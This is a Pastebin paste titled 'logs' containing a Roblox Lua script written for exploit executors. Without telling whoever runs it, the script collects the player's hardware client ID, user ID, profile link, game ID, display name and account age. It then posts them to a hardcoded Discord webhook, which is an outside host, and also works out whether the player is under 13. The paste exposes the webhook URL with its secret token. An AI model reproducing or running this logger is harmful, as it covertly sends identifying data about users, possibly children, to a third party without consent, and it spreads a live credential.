Advertisement
IGTV_PRO

logs

Apr 11th, 2023
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.94 KB | None | 0 0
  1. local Webhook = "https://discord.com/api/webhooks/1095488654882914315/OxMYFdMM8PmCVOHy7szuA4lRCPXJwsQoc8ukUfSsxKXqyVc-yKfNAIxb_KQr1J1srVA2"
  2. local Headers = {["content-type"] = "application/json"}
  3. local player = game.Players.LocalPlayer
  4. local profile = player:GetUnder13() and "Child" or "Adult"
  5. local id = player.UserId
  6. local place_id = game.PlaceId
  7. local place_name = game:GetService("MarketplaceService"):GetProductInfo(place_id).Name
  8.  
  9. local PlayerData =
  10. {
  11. ["content"] = "",
  12. ["embeds"] = {
  13. {
  14. ["title"] = "**Your script has been executed!**",
  15. ["description"] = game.Players.localPlayer.DisplayName.." has executed the script.",
  16. ["icon_url"] = "https://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username="..player.Name,
  17. ["color"] = tonumber(0x2B6BE4),
  18. ["fields"] = {
  19. {
  20. ["name"] = "Client HWID:",
  21. ["value"] = game:GetService("RbxAnalyticsService"):GetClientId(),
  22. ["inline"] = true
  23. },
  24.  
  25. {
  26. ["name"] = "Client Profile:",
  27. ["value"] = "https://www.roblox.com/users/" .. id,
  28. ["inline"] = false
  29. },
  30.  
  31. {
  32. ["name"] = "Place ID:",
  33. ["value"] = "https://www.roblox.com/games/" .. place_id,
  34. ["inline"] = false
  35. },
  36.  
  37. {
  38. ["name"] = "Account Age:",
  39. ["value"] = player.AccountAge,
  40. ["inline"] = false
  41. },
  42. },
  43. }
  44. }
  45. }
  46.  
  47. local PlayerData = game:GetService('HttpService'):JSONEncode(PlayerData)
  48.  
  49. Request = http_request or request or HttpPost or syn.request
  50. Request(
  51. {
  52. Url = Webhook,
  53. Body = PlayerData,
  54. Method = "POST",
  55. Headers = Headers
  56. }
  57. )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement